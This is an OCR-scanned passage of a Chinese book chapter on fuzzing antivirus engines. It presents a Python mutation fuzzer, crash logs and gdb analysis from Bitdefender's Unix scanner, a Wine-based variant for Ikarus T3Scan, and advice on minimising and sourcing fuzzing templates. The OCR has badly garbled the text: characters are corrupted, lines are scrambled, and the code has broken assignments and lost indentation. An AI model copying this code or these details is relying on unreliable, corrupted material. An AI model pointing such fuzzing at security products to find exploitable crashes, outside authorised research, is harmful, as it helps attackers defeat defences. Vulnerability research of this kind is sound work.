(4) 和 之 前 只 创建 255 个 测试 样 例 不 同 ， 此 处 我 们 让 脚本 持续 创建 随机 的 模糊 测试 样本 文件 ， 
直到 手动 停止 模糊 测试 。 

在 开头 的 import 行 代码 下 ， 添 加 如 下 几 行 代码 : 























import shutil 





# CD 
RETURN SIGNALS = {} 
RETURN SIGNALS[138] = "SIGBUS" 
RETURN SIGNALS[139] = "SIGSEGV" 
RETURN SIGNALS[136] - "SIGFPE" 
RETURN SIGNALS[134] = "SIGABRT" 
RETURN SIGNALS[133] = "SIGTRAP" 
RETURN SIGNALS[132] = "SIGILL" 
RETURN SIGNALS[143] = "SIGTERM" 
# 人 
def log(msg): 
print "[$s] $s" $ (time.asctime(), msg) 


接着 ， 用 以 下 代码 替换 先前 cBasicFuzzer.fuzz() 方 法 的 相关 代码 


def fuzz(self): 
log("Starting the fuzzer...") 
orig buf - open(self.file in, "rb").read() 





log("Running 'ulimit -c unlimited'") 
os.system("ulimit -c unlimited") 


# Create mutations of the input file until it's stopped 
while 1: 
buf - self.mutate(orig buf) 
md5 hash - md5(buf).hexdigest() 
log("Writing mutated file $s" % repr(md5 hash)) 
filename = os.path.join(self.folder out, md5 hash) 
with open(filename, "wb") as f: 
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f.write(buf) 


# Run the operating system command to scan the file we created 
cmd = "exec %s %s > /dev/null" $ (self.cmd, filename) 

ret - os.system(cmd) 

log("Running $s returned exit code $d" $ (repr(cmd), ret)) 


if ret in RETURN SIGNALS: 
# If the exit code of the process indicates it crashed, rename 
# the generated "core" file. 
log("CRASH: The sample $s crashed the target. 


Saving information..." % filename) 
shutil.copy("core", "$s.core" $ filename) 
else: 


4 If the proof-of-concept did not crash the target, remove the 
# file we just created 
os.remove(filename) 


Fuzz () 方 法 首先 会 读 取 原 始 模版 文件 ， 然 后 运行 ulimit -c unlimited 命 令 。 和 先前 创建 
255 个 模糊 测试 样 例 不 同 ， 此 处 代码 会 不 断 循环 生成 测试 样 例 。 接 下 来 的 命令 被 修改 成 了 ， 扫 描 
一 个 文件 的 时 候 , 就 把 这 个 进程 的 输入 重新 定向 到 /dev/nul1。 先前 , 扫描 费 对 整个 目录 进行 
THH. 在 Unix 系 统 中 ， 崩 演 的 进程 的 返回 值 实际 上 就 是 其 骨 演 代号 。 因 此 ， 当 使 用 os . system 
运行 了 命令 行 扫描 器 后 ， 肢 本 会 校 验 反 病毒 扫描 器 是 否 崩 演 。 比 如 ， 如 果 返 回 值 是 139， 就 表示 
进程 前 省 代号 是 sTGSEGV, 这 是 一 个 因为 段 错误 产生 的 静 省 。 如 果 返 回 值 代表 的 是 疑似 存在 漏洞 
的 代号 中 的 一 个 , 那么 脚本 将 会 复制 与 崩 演 文件 相关 的 核心 文件 。 否则 ,将 会 删除 生成 的 模糊 测 
试 样 例 。 模 糊 测 试 脚本 会 持续 不 断 地 基于 测试 模版 生成 畸变 文件 ， 并 将 朋 演 时 产生 的 core dump 
文件 以 及 PoC 文 件 保存 到 我 们 刚刚 创建 的 输出 目录 中 去 。 
以 下 是 模糊 测试 脚本 在 针对 Bitdefender 反 病毒 软件 Unix 版 本 进行 测试 过 程 中 的 输出 信息 : 


$ python ../simple av fuzzerv2.py mysterious file out/ bdscan 

Mon Apr 20 12:39:05 2015] Starting the fuzzer... 

Mon Apr 20 12:39:05 2015] Running 'ulimit -c unlimited' 

Mon Apr 20 12:39:05 2015] Writing mutated file 
'986c060db72d2ba9050£587c9a69£7d5' 

Mon Apr 20 12:39:07 2015] Running 'exec bdscan 
out/986c060db72d25a9050£587c9a69f£7d5 > /dev/null' returned exit code 0 
Mon Apr 20 12:39:07 2015] Writing mutated file 
'e5e4b5fe275971b9b24307626e8f91£7' 

Mon Apr 20 12:39:10 2015] Running 'exec bdscan 
out/e5e4b5fe275971b9b24307626e8f91f7 > /dev/null' returned exit code 0 
Mon Apr 20 12:39:10 2015] Writing mutated file 
'287968£D027c£18c80f£c3dcd5889db136' 

Mon Apr 20 12:39:10 2015] Running 'exec bdscan 
0ut/287968fb27cf18c80fc3dcd5889db136 > /dev/null' returned exit code 65024 
Mon Apr 20 12:39:10 2015] Writing mutated file 
'01ca584150a0c438d3ba3e7007cda7bd' 

Mon Apr 20 12:39:11 2015] Running 'exec bdscan 
out/01ca5841500a0c438d30ba3e7007cda7bd > /dev/null' returned exit code 
65024 
Mon Apr 20 12:39:11 2015] Writing mutated file 
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'6bae9a6fla6cef21fe0d6eb31d1037a5' 

Mon Apr 20 12:39:11 2015] Running 'exec bdscan 
out/6bae9a6fla6cef21fe0d6eb31d1037a5 > /dev/null' returned exit code 
65024 

Mon Apr 20 12:39:11 2015] Writing mutated file 
'2e783b0aaad7e668787a61681445cpb08' 

[t av) 

Mon Apr 20 12:39:19 2015] Writing mutated file 
'84652cc61a7£0£2fbe578dcad490c600' 

Mon Apr 20 12:39:22 2015] Running 'exec bdscan 
out/84652cc61a7f0f2fbe578dcad490c600 » /dev/null' returned exit code 139 

Mon Apr 20 12:39:22 2015] CRASH: The sample 
out/84652cc61a7f0f2fbe578dcad490c600 crashed the target. Saving 
information... 

Feraj 

Mon Apr 20 12:51:16 2015] Writing mutated file 
'f6296d601a516278634b44951a67b0đd4' 

Mon Apr 20 12:51:19 2015] Running 'exec bdscan 
out/f62964601a516278634b44951a67b084 > /dev/null' returned exit code 139 

Mon Apr 20 12:51:19 2015] CRASH: The sample 








out/f6296d601a516278634b44951a67b0d4 crashed the target. 


information... 





Saving 


^C (Press Ctrl+C to stop it) 


在 模糊 测试 过 程 中 , Bitdefender 反 病毒 软件 没 过 多 久 就 


dump 文 件 ， 以 及 触发 月 溃 的 
工具 ) 来 查看 dump 文 件 ， 并 


$ LANG=C gdb --quiet 
Reading symbols from 
DT 
Core was generated by 
Program terminated wi 
#0  Oxf30beXXX in ?? 
(gdb) x /i $pc 
=> Oxf30beXXX: 
(gdb) 


mov 
i r ecx edx 


Hitt Y, 模糊 测试 脚本 同时 保存 了 core 
村 变 模糊 测试 文件 样 例 。 在 此 之 后 ,我 们 可 以 使 用 gab (或 其 他 调试 
找 出 骨 溃 的 原因 。 


bdscan f6296dq601a516278634pb44951a67b0dq4.core 
bdscan...(no debugging symbols found)...done. 


'bdscan out/f62968601a8516278634b44951a67508a4'. 
th signal SIGSEGV, Segmentation fault. 
() 





0x24 (%ecx,%edx,1),%eax 


ecx 

edx 
(gdb) 
0x23a80550: 


0x23a80550 
0x9e181c8 


x /x $ecx 


Cannot access memory at address 0x23a80550 


598213968 
165773768 


在 本 例 中 , Bitdefender 由 于 非法 释放 了 内 存 引用 的 表达 式 1 EDX+0x24( 即 0x23a80550 ), 





ECX+] 





产生 了 一 个 月 溃 。 


能 收集 到 足够 多 的 信息 。 比 如 ， 脚 本 不 具备 将 相似 
使 用 反 病毒 命令 行 扫 描 顺 逐一 扫描 样 本 文件 ， 所 以 


这 里 我 们 的 模糊 测试 脚本 仍然 不 够 完善 , 除了 一 些 基础 的 核心 dump 文 件 和 PoC 文 件 外 , 还 不 
骨 溃 信息 分 类 的 能 力 。 此 外 ,因为 脚本 会 连续 
运行 速度 会 相对 较 慢 。 

本 节 重 点 探讨 的 是 在 Unix 平 台 上 模糊 测试 的 手段 和 方式 。 接 下 来 将 会 探讨 如 何在 Windows 系 





lun 





统 平 台 上 对 反 病 毒 软件 进行 模糊 测试 。 
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2. 将 反 病毒 内 核 移植 到 Unix 平 台 下 

如 果 反 病毒 软件 只 能 运行 在 Windows 平 台 上 的 话 ， 最 好 将 模糊 测试 工具 ( 最 起 码 将 模糊 测试 
工具 核心 部 分 ) 移植 到 更 适合 自动 化 模糊 测试 的 平台 上 去 。 比 如 ， 如 今 在 Windows 平 台 上 进行 大 
中 型 规模 的 模糊 测试 可 谓 困 难 重重 。 如 果 想 要 搭建 一 个 可 以 运行 模糊 测试 工具 的 小 型 虚拟 机 , 我 
们 只 能 选择 Windows XP; 或 者 创建 一 个 10 GB~20 GB 的 虚拟 机 安装 Windows 7。 如 果 要 在 虚拟 机 
内 安装 Windows 8.1 或 Windows 10， 就 需要 增加 运行 虚拟 机 所 需 的 最 小 磁盘 空间 大 小 。 但 对 Linux 
或 其 他 类 Unix 系 统 平台 来 说 , 比如 FreeBSD , 我 们 创建 的 虚拟 机 可 以 相对 小 一 些 。 在 一 些 案例 中 ， 
创建 一 个 占用 1 GB 或 512 MB 磁盘 空间 的 小 型 虚拟 机 , 并 安装 目标 测试 程序 也 是 可 行 的 。 很 显然 ， 
虚拟 机 占用 的 磁盘 空间 越 小 ， 也 就 越 便于 管理 。 对 于 运行 了 Windows XP 的 虚拟 机 来 说 ， 一 般 需 
要 1 GB~2 GB 内 存 的 机 器 ， 不 过 事实 上 512 MB 内 存 也 够 了 。 对 于 运行 Windows 7 的 虚拟 机 来 说 ， 
推荐 用 于 模糊 测试 的 最 低 虚拟 机 分 配 内 存 大 小 是 2 GB , 而 大 多 数 情况 下 , 可 以 较 好 完成 相关 工作 
的 内 存 大 小 应 该 是 4 GB。( 分 配 使 用 的 内 存 越 小 ， 就 越 容易 因为 低 内 存 和 分 配 错误 产生 误 报 。 ) 

由 于 每 一 个 新 版 本 的 Windows 对 内 存 和 磁盘 空间 的 消耗 会 越 来 越 大 ,推荐 使 用 另 一 种 模糊 测 
试 方 式 : 借助 Wine ( 第 2 章 中 简单 介绍 过 ) 设法 在 Linux 系 统 中 对 Windows 应 用 程序 进行 模糊 测试 。 
Wine ( Wine Is Not an Emulator ) 是 一 款 开 源 免费 的 用 于 在 Linux 下 实现 Windows APIs 的 工具 。 借 
助 Wine 可 以 在 Unix 系 统 上 , 无 须 对 相关 二 进 制 文件 进行 兼容 性 修改 , 就 可 以 运行 相关 文件 。 同时 
有 了 Wine, 我 们 还 可 以 在 Unix 系 统 中 ， 和 原生 Unix 应 用 程序 一 样 流畅 地 运行 一 些 Windows 系 统 特 
有 的 二 进 制 文件 ， 比 如 DLL。Wine 不 会 模拟 执行 代码 ,而 是 以 原生 方式 全 速 执行 代码 。 通 过 捕获 
在 真实 Windows 操 作 系 统 中 处 理 的 系统 调用 和 中 断 ，Wine 根 据 Linux 内 核 特性 对 其 作出 相关 变更 。 
此 外 ，winelib 是 一 款 可 以 用 于 借助 Windows SDK 来 编写 原生 Unix 应 用 程序 的 工具 集 。 

以 下 两 种 方式 对 在 类 Unix 系 统 平 台 上 对 反 病 毒 软 件 Windows 版 本 进行 测试 大 有 帮助 : 

口 逆向 反 病 毒 软件 内 核 ， 使 用 winelip 将 其 导 到 Unix 平 台 上 |; 
口 更 简单 的 实现 方式 是 ， 在 Linux 或 Unix 平 台 上 ， 借 助 Wine 运 行 独立 的 命令 行 扫描 器 。 

第 一 种 方法 可 以 说 是 最 佳 途径 , 因为 不 需要 借助 Wine 层 面 或 其 他 层面 的 模拟 , 而 是 通过 逆向 
分 析 内 核 ， 为 仅 兼 容 Windows 的 反 病 毒 引 擎 编写 接口 。 但 是 ， 该 方法 非常 费时 。 逆 向 分 析 工 程 需 
要 首先 通过 逆向 分 析 来 挖掘 用 于 加 载 内 核 、 启 动 扫 描 等 的 接口 , 然后 找 出 合适 的 结构 编写 非 官方 
SDK， 最 后 编写 可 以 运行 在 类 Unix 系 统 平 台 上 的 工具 。 由 于 这 种 办 法 需要 耗费 太 多 精力 ,在 很 多 
情况 下 是 不 可 行 的 。 对 于 时 间 充 裕 的 长 期 研究 来 说 ,这 确实 是 一 个 很 好 的 途径 ; 但 对 于 相对 较 小 
的 项 目 来 说 ， 就 不 太 适 宜 了 。 我 们 可 以 使 用 基于 相同 理念 的 替代 方法 : 和 使 用 winelip 类 似 , 我 
们 可 以 使 用 Wine 来 运行 独立 命令 行 扫描 器 。 

3. 借助 Wine 进 行 模糊 测试 

本 节 会 演示 如 何 借 助 Wine 在 Linux 系 统 中 运行 T3Scan 命 令 行 扫描 器 Windows 版 。 我 们 可 以 在 
http://updates.ikarus.at/updates/update.html 下 载 到 T3Scan 命 令 行 扫描 器 。 

我 们 需要 自己 动手 提取 t3scan.exe 和 病毒 数据 库 文 件 t3sigs.vdb。 下 载 了 两 个 对 应 的 文件 以 后 ， 

背 助 Wine 使 用 以 下 命令 ， 运 行 tf3scan.exe: 


$ wine t3scan.exe 
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这 时 候 会 弹出 一 个 提示 框 ,询问 我 们 是 否 要 提取 文件 。 选 中 当前 目录 ,然后 点 击 Extract 提 取 
文件 。 我 们 可 以 在 Wine 创 建 的 虚拟 Z 盘 下 搜索 找到 当前 目录 ， 和 否则 就 直接 在 目录 处 填写 。 此 外 ， 


我 们 还 可 以 在 Windows 操 作 系 统 
吊 到 当前 目录 下 。 等 我 们 凑 齐 T3Scan.exe 、t3.dll 和 病毒 数据 库 文件 t3sigs.vdb 三 个 文件 后 ， 
可 以 运行 以 下 命令 测试 T3Scan 能 


{3.dll 复 外 

















运行 命令 提取 工具 ， 人 然后 将 最 终 提取 出 的 文件 T3Scan.exe 和 





运行 : 


$ wine T3Scan.exe 


fixme:heap:HeapSetInformation ( 
Syntax: t3scan [options] «sampl 
t3scan [options] «path» 

Options: 

-help | -h | -? 

-filelist | -F «filename» 
file «filename» 

-logfile | -1 «filename» 

-maxfilesize | -m <n> 

-n 

-nosubdirs | -d 

-r «n» 

-vdbpath | -vp «directory» 


Special options: 
-noarchives | -na 
-rtimeout <seconds> 

archive after <seconds> 
-sa 

for the archive is reported 
-timeout «seconds» 

«seconds» 

-version | -ver 
version 

-vdbver 

-verbose | -v 

-noadware 


nil) 1 (nil) O 
es» 
This help 


Read input files from newline-separated 


Create log file 
Max. filesize in MB 
No simulation 

Do not scan sub directories 

Max. recursive scans (default 8) 
Path to signature database 


(default 64MB) 


Do not scan archive content 


Stop recursively scanning files in an 


Summarize archives: 
Stop scanning a single file after 
Display the program, 
Display VDB version 


Increase the output level 
Disable adware/spyware signatures 


only the final result 


engine and VDB 


如 果 看 到 程序 输出 日 志 , 就 意味 着 T3Scan 可 以 借助 Wine 正 确 运行 。 


现在 , 我 们 需要 根据 Wine 





的 运行 方式 ,对 先前 创建 的 简单 模糊 测试 脚本 进行 调整 ,首先 ,需要 借助 Python 函 数 os . system () 
运行 程序 。 程 序 在 遇 到 有 段 错误 SIGSEGV 的 时 候 , 会 返回 返回 值 139。 在 遇 到 SIGBUS 崩 演 的 时 候 ， 
会 返回 返回 值 138， 以 此 类 推 。 但 是 ， 使 用 Wine 运 行程 序 的 时 候 就 会 有 所 不 同 了 : 如 果 要 捕获 返 
回 值 的 话 ， 我们 需要 让 相关 程序 向 右 移动 8 位 ， 接 着 加 128， 来 获取 返回 值 。 这 样 一 来 ， 就 又 可 以 


继续 使 用 之 前 名 为 Ri 








ETURN_SIGNALS 的 字典 了 。 在 模糊 测试 脚本 中 添加 一 个 标志 , 来 确定 当前 是 








否 使 用 Wine 来 运行 程序 。 对 调整 优化 前 后 的 代码 对 比 结果 如 下 : 


$ diff simple av fuzzerv2.py simple av fuzzer wine.py 


27627 
def | init (self, 


< 


file in, folder out, cmd): 
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> def _ init (self, file in, folder out, cmd, is wine = False): 


32a33,34 

> self.is wine = is wine 

Æ 

65c67 

€ cmd = "exec $s %s > /dev/null" $ (self.cmd, filename) 

> cmd = "%s %s" % (self.cmd, filename) 

66a69 

> ret = (ret >> 8) + 128 

81c84 

« print "Usage:", sys.argv[0], "«filename» «output directory» 


«av scan command»" 


> print "Usage:", sys.argv[0], "«filename» «output directory» 
«av scan command» [--wine]" 


84,85c87,88 
< def main(file in, folder out, cmd): 
« fuzzer = CBasicFuzzer(file in, folder out, cmd) 


» def main(file in, folder out, cmd, is wine-False): 


> fuzzer = CBasicFuzzer(file in, folder out, cmd, is wine) 
89c92 
g if len(sys.argv) !- 4: 


> if len(sys.argv) < 4: 


91c94 

« else: 

> elif len(sys.argv) == 4: 

92a96,97 

> elif len(sys.argv) == 5: 

> main(sys.argv[11, sys.argv[2]1], sys.argv[3], True) 





上 述 结果 中 加 粗 的 部 分 就 是 模糊 测试 脚本 中 新 增 的 代码 。 完 成 上 述 调整 后 , 我 们 就 可 以 和 之 
前 在 Unix 平 台 上 对 原生 Bitdefendet 命 令 行 扫描 器 进行 模糊 测试 那样 ， 对 只 兼容 Windows 操 作 系 统 
的 Ikarus 命 令 行 扫描 器 进行 模糊 测试 了 ， 测 试 过 程 如 下 : 


$ python simple av fuzzer wine.py s bio.lzh out "wine32 test/T3Scan.exe" \ Es 
--wine 


[Mon Apr 20 18:55:23 2015] Starting the fuzzer... 
[Mon Apr 20 18:55:23 2015] Running 'ulimit -c unlimited' 
[Mon Apr 20 18:55:27 2015] Writing mutated file 
'7ae0b2339d57dbc58dd748a426c3358b' 
IKARUS - T3SCAN V1.32.33.0 (WIN32) 
Engine version: 1.08.09 
VDB: 20.04.2015 12:09:39 (Build: 91448) 
Copyright ® IKARUS Security Software GmbH 2014. 
All rights reserved. 








Summary : 
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1 file scanned 
0 files infected 


Used time: 0:02.636 


[Mon Apr 20 18:55:30 2015] Running 'wine32 test/T3Scan.exe 
out/7ae0b2339d57dbc58d3748a426c3358b' returned exit code 128 
[Mon Apr 20 18:55:34 2015] Writing mutated file 
'7c774e3d262f£136704eeed351503210173' 
IKARUS - T3SCAN V1.32.33.0 (WIN32) 

Engine version: 1.08.09 

VDB: 20.04.2015 12:09:39 (Build: 91448) 

Copyright 6 IKARUS Security Software GmbH 2014. 

All rights reserved. 


Summary : 


1 file scanned 
0 files infected 


Used time: 0:02.627 


[Mon Apr 20 18:55:37 2015] Running 'wine32 test/T3Scan.exe 
out/7c774ed262f136704eeed35153210173' returned exit code 128 
by s 


现在 模糊 测试 脚本 就 可 以 正常 工作 了 。 如 果 我 们 传人 正确 的 模糊 测试 样本 并 等 待 少许 时 间 ， 
反 病 毒 扫描 屁 就 会 月 演 ， 模 糊 测 脚本 会 将 相关 信息 保存 到 选 定 的 输出 目录 下 。 

4. 问题 、 问 题 、 更 多 的 问题 

目前 ,前面 开发 的 针对 反 病 毒 软件 的 模糊 测试 工具 存在 不 少 问题 。 比 如 ， 脚 本 会 对 每 个 创建 
的 文件 都 运行 一 个 实例 。 每 一 次 生成 畸变 样本 ， 都 会 创建 一 个 单一 进程 。 脚 本 只 使 用 了 一 种 简单 
的 畸形 文件 生成 策略 ， 同 时 无 法 提供 应 用 程序 骨 泪 的 细节 。 此 外 ,脚本 依照 传人 的 单一 模糊 测试 
模版 进行 测试 。 如 果 我 们 要 测试 的 文件 格式 解析 器 不 存在 缺陷 呢 ? 如 果 我 们 使 用 的 模糊 测试 模版 
无 法 挖掘 出 对 应 的 缺陷 呢 ? 接 下 来 将 会 讨论 和 解决 上 述 两 个 问题 。 首 先 我 们 要 做 的 是 , 找到 可 以 
作为 模糊 测试 模版 的 好 的 样本 文件 。 


13.1.4 ”找到 好 的 模糊 测试 模版 


模糊 测试 模版 文件 是 模糊 测试 工具 改动 和 生成 畸变 文件 的 原始 依据 。 在 之 前 的 案例 中 , 运行 
针对 Windows 应 用 的 模糊 测试 时 ， 我 使 用 了 LZH 文 件 。 第 一 次 运行 模糊 测试 脚本 时 ， 我 使 用 的 是 
ELF 文 件 。 这 两 个 文件 格式 仅仅 是 反 病毒 引擎 支持 扫描 的 众多 文件 格式 中 的 一 角 。 反 病毒 产品 支 
持 扫描 的 文件 格式 的 具体 列表 一 般 情况 下 无 法 知晓 , 但 是 有 一 些 文件 格式 , 广泛 被 反 病 毒 软件 支 
持 扫描 。 这 类 文件 格式 包括 ( 但 不 仅 限于 ): 压缩 文件 、 公 文 包 文件 .EXE 封 装 工具 、Microsoft Office 
文件 格式 、HTML JavaScript, VBScript, XML, Windows LNK 文 件 ， 等 等 。 

找到 用 于 进行 反 病毒 软件 模糊 测试 的 好 的 模版 不 仅 意 味 着 找到 目标 反 病毒 软 件 支 持 的 某 种 
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文件 格式 〈 比如，Windows PE 文件 ) 和 子 格式 ( 比如 EXE 封 装 工 具 )， 还 意味 着 要 找到 针对 特定 
文件 格式 的 好 的 模糊 测试 模版 。 比 如 ,如 果 想 要 测试 OLE2 容 器 ( 比如 Microsoft Word 或 Excel 文 件 )， 
选取 的 模糊 测试 模版 应 该 限定 为 基础 Word 或 Excel 文 档 ， 然 后 在 模糊 测试 过 程 中 ， 我 们 就 能 有 和 针 
对 性 地 对 Word 或 Excel 文 件 的 某 些 特性 进行 测试 ， 而 不 是 撤 网 式 地 进行 测试 。 要 模糊 测试 所 有 特 
性 集合 几乎 是 不 可 能 的 , 不 过 我 们 可 以 试 着 使 用 一 种 叫 作 “ 语 料 库 筛 选 ”的 技术 来 找到 更 好 的 模 
糊 测试 模版 。 这 项 技术 的 工作 原理 如 下 。 
口 首先 借助 类 似 DynamoRIO 或 ntel PIN 的 工具 , 在 二 进 制 指令 模式 下 使 用 测试 目标 软件 , 处 
理 第 一 个 样本 文件 。 同 时 ， 记 录 下 被 执行 的 不 同 基础 区 块 。 
口 只 有 当 之 前 样本 没有 执行 过 的 新 基础 区 块 被 执行 的 时 候 ， 新 生成 的 对 应 样本 才 会 传递 给 
测试 程序 进行 模糊 测试 。 
O 如 果 新 的 样本 执行 的 基础 区 块 ， 是 先前 样本 没有 执行 过 的 ， 才 会 被 接受 。 
口 如 果 一 个 样本 包含 的 所 有 代码 是 之 前 样本 有 的 ， 就 没有 必要 使 用 对 应 样本 做 模版 了 ， 
为 先前 的 样本 已 经 覆盖 到 了 要 测试 的 功能 点 。 

我 只 知道 一 种 可 以 用 于 计算 代码 覆盖 率 的 现成 工具 ,名 叫 PeachMinset。 可 以 通过 community. 
peachfuzzer.com/v3/minset.html 了 解 较 早 版 本 Peach V3 的 工作 方式 。 

一 般 来 说 ，PeachMinset 的 工作 方式 有 以 下 两 步 : 

(1) 从 样本 文件 中 收集 回溯 信息 ; 

Q) 计算 最 小 集合 。 

上 述 步 又 中 的 第 一 步 需要 的 时 间 会 比较 长 , 因为 程序 会 借助 二 进 制 执行 存在 的 每 一 个 单一 模 
版 文件 。 计 算 最 小 集合 的 过 程 相对 较 快 ,因为 程序 只 需要 计算 找 出 能 够 尽 可 能 多 地 覆盖 到 功能 特 
性 的 文件 集合 。 
以 下 是 运行 内 部 使 用 了 PIN 库 的 PeachMinset,exe， 来 针对 一 系列 PNG 文 件 进行 处 理 筛选 的 过 
程 示例 : 


>peachminset -s pinsamples -m minset -t traces bin\pngcheck.exe %%s 
























































Peach 3 -- Minset 

Copyright (c) Deja vu Security 

*] Running both trace and coverage analysis 

*] Running trace analysis on 15 samples... 

1:15 Converage trace of pinsamplesMbasn0g01.png...done. 
2:15 Converage trace of pinsamplesMbasn0g02.png...done. 
3x15 Converage trace of pinsamplesVbasn0g04.png...done. 
4:15 Converage trace of pinsamplesMbasn0g08.png...done. 
5:15 Converage trace of pinsamplesMbasn0gi16.png...done. 
6:15 Converage trace of pinsamplesMbasn2c08.png...done. 
7:15 Converage trace of pinsamplesMbasn2c16.png...done. 
815 Converage trace of pinsamples\basn3p01.png...done. 
9:15 Converage trace of pinsamples M basn3p02.png...done. 
10:15] Converage trace of pinsamplesMbasn3p04.png...done. 
11:15] Converage trace of pinsamplesMbasn3p08.png...done. 
12:215] Converage trace of pinsamplesMbasn4a08.png...done. 
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13:15] Converage trace of pinsamplesMbasn4aló6.png...done. 
14:15] Converage trace of pinsamples M basn6a08.png...done. 
15:5. Converage trace of pinsamplesMbasnó6aló6.png...done. 


*] Finished 

*] Running coverage analysis... 

zi 3 files were selected from a total of 15. 

*] Copying over selected files... 

z pinsamplesMVbasn3p08.png -> minsetMbasn3p08.png 
- pinsamplesMbasn3p04.png -> minset' basn3p04.png 
= pinsamplesMbasn2c16.png -> minset\basn2c16.png 








*] Finished 
从 15 个 PNG 文 件 中 ，PeachMinset.exe 只 筛选 出 了 3 个 可 以 全 部 履 盖 到 15 个 文件 特性 的 文件 。 
在 模糊 测试 的 过 程 中 ， 减 少 模版 文件 的 数量 是 用 最 少 的 时 间 获 得 最 好 效果 的 最 佳 实现 方式 。 


13.1.5 ”查找 模版 文件 


在 一 些 情况 下 ,尤其 是 当 提 到 反 病 毒 引 擎 的 时 候 , 我 们 需要 找 出 不 典型 的 文件 样本 ( 即 那 些 
通常 情况 下 在 磁盘 上 找 不 到 的 文件 )。 要 找到 这 类 文件 ， 有 以 下 建议 可 供 参考 。 
O Google ”可 以 在 搜索 引擎 内 ， 通 过 关键 词 intitle:“index of /^ .lzh 查找 这 类 索引 式 Web 字 典 。 
通过 检索 ， 我 们 可 以 查找 到 索引 式 Web 字 典 中 以 .lzh 结 尾 的 文件 〈 一 种 压缩 文件 格式 )。 
O 还 是 Google 借助 fletype:LZH 也 可 以 查找 到 有 趣 的 搜索 结果 。 一 般 情况 下 这 种 检索 
方式 有 效 ， 但 是 需要 手工 排除 一 些 与 Facebook 有 关 的 搜索 结果 。 
口 VirusTotal 如 果 有 权限 使 用 私有 版 本 的 VirusTotal 的 话 ， 我 们 会 发 现 ， 对 于 每 一 种 文件 格 

式 ， 都 最 起 码 有 一 个 可 供 测试 使 用 的 样本 文件 。 

男 一 种 查找 模糊 测试 模版 文件 的 好 方法 是 , 使 用 反 病 毒 产品 自身 使 用 的 文件 样本 。 当 然 , 商 
业 版 本 反 病 毒 套 装 不 会 公开 他 们 的 测试 样本 ,但 是 我 们 可 以 获取 到 开源 反 病毒 扫描 器 ClamAV 的 
类 似 测试 样本 。 可 以 从 GitHub 上 下 载 并 编译 : https://github.com/vrtadmin/clamav-devel。 

由 于 这 些 测试 样本 是 动态 生成 的 ， 我们 首先 需要 编译 ClamAV。 可 以 将 这 些 生成 的 样本 文件 
提取 作为 , 针对 其 他 反 病 毒 软件 进行 模糊 测试 的 模版 。 由 于 覆盖 了 大 多 数 反 病毒 产品 支持 处 理 的 
文件 格式 , 这些 样本 文件 可 以 作为 模糊 测试 过 程 中 良好 的 切 和 人 点。 目前 包含 的 样本 文件 种 类 如 下 : 


口 samples/av/clam/clam.sis 











































































































口 samples/av/clam/clam.odc.cpio 
L1 samples/av/clam/clam.exe.html 
口 samples/av/clam/clam.ole.doc 
C] samples/av/clam/clam.d64.zip 
Q samples/av/clam/clam.mail 


LJ samples/av/clam/clam cache emax.tgz 





DD samples/av/clam/clam.cab 
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口 samples/av/clam/clam.arj 

口 samples/av/clam/clamav-mirror-howto.pdf 
DQ samples/av/clam/clam.newc.cpio 

C] samples/av/clam/clam.exe.rtf 

口 samples/av/clam/clam.7z 

口 samples/av/clam/clam.ppt 

0 samples/av/clam/clam-v2.rar 

口 samples/av/clam/clam.tar.gz 

口 samples/av/clam/clam.pdf 

口 samples/av/clam/clam.impl.zip 

CI samples/av/clam/clam.zip 

OD samples/av/clam/clam.bin-le.cpio 

C samples/av/clam/clam.exe.szdd 

口 samples/av/clam/clam.chm 

C] samples/av/clam/clam-v3.rar 

C] samples/av/clam/clam.exe.bz2 

口 samples/av/clam/clam.exe.mbox.base64 
口 samples/av/clam/clam.tnef 

0 samples/av/clam/clam.exe.binhex 

C] samples/av/clam/clam.bin-be.cpio 


口 samples/av/clam/clam.exe.mbox.uu 





Q samples/av/clam/clam.bz2.zip 
这 里 还 有 一 个 建议 ， 就 是 使 用 PROTOS Genome Test Suite c10-archive。 如 下 所 示 的 是 一 个 针 
对 以 下 文件 格式 的 修改 过 的 压缩 文件 集 。 
Dace 91518 
O arj 255343 
Qb 321818 EE 
m cab 130823 
ügz 22711 
口 Iha 176631 
Drar 198865 
DQ tar 40549 
0 zip 189833 
D zoo 163595 
口 total 1632691 
可 以 通过 以 下 地 址 下 载 到 该 畸变 压缩 文件 集 : https://www.ee.oulu.fi/research/ouspg/gPROTOS _ 
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Test-Suite. cl10-archive。 

即便 是 该 测试 样本 集 对 所 有 人 公开 ， 而 且 很 可 能 已 经 包含 在 不 少 反 病毒 产品 的 测试 套 组 中 ， 
我 们 还 是 会 惊讶 地 发 现 , 还 有 很 多 反 病 毒 软件 在 扫描 这 些 样本 的 过 程 中 出 现 问题 。 如 果 我 们 使 用 
上 述 样本 文件 作为 畸变 模糊 测试 的 模版 ， 这 种 感觉 会 更 加 强烈 。 


13.1.6 ”使 代码 覆盖 率 最 大 化 


代码 覆盖 测试 是 一 种 动态 分 析 技 术 , 它 基 于 在 程序 运行 过 程 中 通过 相关 指令 来 确定 程序 执行 
的 不 同 指令 集 、 基 本 区 块 或 函数 的 数量 。 本 章 前 面谈 到 PeachMinset.exe 工 具 时 ， 简 单 探讨 了 代码 

盖 问 题 , 使 用 该 工具 可 以 开展 代码 覆盖 测试 , 筛选 出 可 以 覆盖 最 多 程序 特性 的 样本 文件 。 但是， 
使 用 PeachMinset.exe 会 受到 传人 样本 执行 或 覆盖 的 特性 数量 的 限制 。 

如 果 在 使 用 PeachMinset.exe 筛 选 出 来 的 测试 样本 进行 模糊 测试 的 过 程 中 , 没有 挖掘 到 任何 漏 
洞 ， 我 们 需要 考虑 使 用 以 下 方式 : 

口 查找 可 以 覆盖 更 多 新 特性 的 测试 样本 ; 

口 借助 工具 最 大 化 样本 文件 的 代码 覆盖 率 。 

这 里 重点 探讨 第 二 种 方式 。 最 大 化 代码 覆盖 率 有 多 种 方式 , 目前 研究 和 使 用 较 多 的 方法 如 下 。 
口 借助 符号 化 执行 和 SMT 处 理工 具 。 这 类 工具 会 将 执行 的 代码 或 在 目标 库 中 发 现 的 代码 进 

行 转化 ， 提 取代 码 中 的 变量 ， 并 将 其 虚拟 化 ， 生 成 SMIT 公 式 ， 然 后 使 用 处 理工 具 来 找 出 

可 以 覆盖 更 多 代码 的 模糊 测试 样本 。 

口 基于 模糊 测试 模版 文件 随机 或 半 随 机 生成 测试 样 例 ， 然 后 使 用 代码 覆盖 测试 工具 ， 判 断 

新 生成 的 样本 是 否 会 执行 新 的 指令 、 基 础 区 块 或 函数 。 

